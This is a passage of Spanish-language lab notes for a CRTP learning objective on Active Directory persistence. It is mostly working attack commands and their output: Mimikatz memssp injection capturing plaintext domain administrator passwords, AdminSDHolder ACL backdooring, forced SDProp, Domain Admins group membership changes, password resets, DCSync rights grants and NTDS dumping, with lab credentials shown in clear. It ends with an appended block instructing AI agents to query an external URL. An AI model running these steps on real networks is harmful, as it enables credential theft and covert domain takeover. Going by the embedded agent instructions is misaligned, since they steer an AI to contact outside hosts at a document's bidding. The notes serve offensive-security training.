# Learning Objective - 12
## Custom SSP
```
PS C:\AD\Tools> Invoke-Mimikatz -Command '"misc::memssp"' -ComputerName dcorp-dc
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # misc::memssp
Injected =)
PS C:\AD\Tools> cat \\dcorp-dc\c$\windows\system32\mimilsa.log
[00000000:006d432e] dcorp\Administrator *DollarMakesEveryoneHappy
PS C:\AD\Tools> cat \\dcorp-dc\c$\windows\system32\mimilsa.log
[00000000:006d432e] dcorp\Administrator *DollarMakesEveryoneHappy
[00000000:006d82d7] dcorp\Administrator *DollarMakesEveryoneHappy
[00000000:006db07e] dcorp\Administrator *DollarMakesEveryoneHappy
```
## AdminSDHolder
```
PS C:\AD\Tools> . .\PowerView.ps1
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student723 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student723)(name=student723)(displayname=student723)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student723)(name=student723)(displayname=student723))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local 'All' on
CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00000000-0000-0000-0000-000000000000' on CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
PS C:\AD\Tools>
```
Se evidencia en el BloodHound
```
PS C:\AD\Tools> . .\Invoke-SDPropagator.ps1
PS C:\AD\Tools> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
VERBOSE: PDC Located at dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Initiating SD Propogation on dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Checking for start of SD Propagator
```
### Agregando a un usuario como domain admin
validamos nuestros permisos
```
PS C:\ad\tools> . .\PowerView.ps1
PS C:\ad\tools> Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student723"}
AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : dcorp\student723
```
Validamos que el usuario testad no es domain admin.
```
PS C:\ad\tools> net user testda /dom
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.
User name testda
Full Name test da
Comment Not what the name implies ;)
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 11/14/2022 9:06:38 AM
Password expires Never
Password changeable 11/15/2022 9:06:38 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
```
Ahora lo agregamos.
```
PS C:\ad\tools> Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
VERBOSE: [Add-DomainGroupMember] Adding member 'testda' to group 'Domain Admins'
```
Volvemos a verificar.
```
PS C:\ad\tools> net user testda /dom
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.
User name testda
Full Name test da
Comment Not what the name implies ;)
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 11/14/2022 9:06:38 AM
Password expires Never
Password changeable 11/15/2022 9:06:38 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Admins *Domain Users
The command completed successfully.
```
Tambien podemos remover usuarios.
```
PS C:\ad\tools> Remove-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
VERBOSE: [Remove-DomainGroupMember] Removing member 'testda' from group 'Domain Admins'
True
PS C:\ad\tools> net user testda /dom
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.
User name testda
Full Name test da
Comment Not what the name implies ;)
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 11/14/2022 9:06:38 AM
Password expires Never
Password changeable 11/15/2022 9:06:38 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
```
### Forzando el cambio de clave
Agregamos los permisos para reinicio de clave.
```
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student723 -Rights ResetPassword -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student723)(name=student723)(displayname=student723)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student723)(name=student723)(displayname=student723))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
'ResetPassword' on CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
```
Ejecutamos el Invoke-SDPropagator para aplicar los cambios ahora mismo.
```
PS C:\AD\Tools> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
VERBOSE: PDC Located at dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Initiating SD Propogation on dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Checking for start of SD Propagator
```
Verificamos los permisos:
```
PS C:\ad\tools> Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student723"}
AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Force-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\student723
```
intentando reiniciar la clave.
```
PS C:\ad\tools> Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Bromita123!" -AsPlainText -Force) -Verbose
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'testda'
VERBOSE: [Set-DomainUserPassword] Password for user 'testda' successfully reset
```
Se recomiendo segun lo analizado en las pruebas, que nose maneje mas de 1 permisos por acl en el AdminSDHolder.
## Rights Abuse
Validamos si puede realizar DcSync.
```
$ crackmapexec smb 172.16.2.1 -u student723 -p 'hT3qDFRHGzVpJtym' --ntds
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym
SMB 172.16.2.1 445 DCORP-DC [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 172.16.2.1 445 DCORP-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 172.16.2.1 445 DCORP-DC [-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
```
Luego le asignamos los permisos:
```
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student723 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student723)(name=student723)(displayname=student723)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student723)(name=student723)(displayname=student723))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (|(distinguishedname=DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (&(|(distinguishedname=DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local 'All' on
DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00000000-0000-0000-0000-000000000000' on DC=dollarcorp,DC=moneycorp,DC=local
```
Se puede validar el permiso asignado en el bloodhound.
Probamos de nuevo el dcsync.
Asi como se dio todos los permisos hacia el dc, tambien se puede dar permisos específicamente para DCSync.
{% code overflow="wrap" %}
```
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student723 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
```
{% endcode %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-12.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.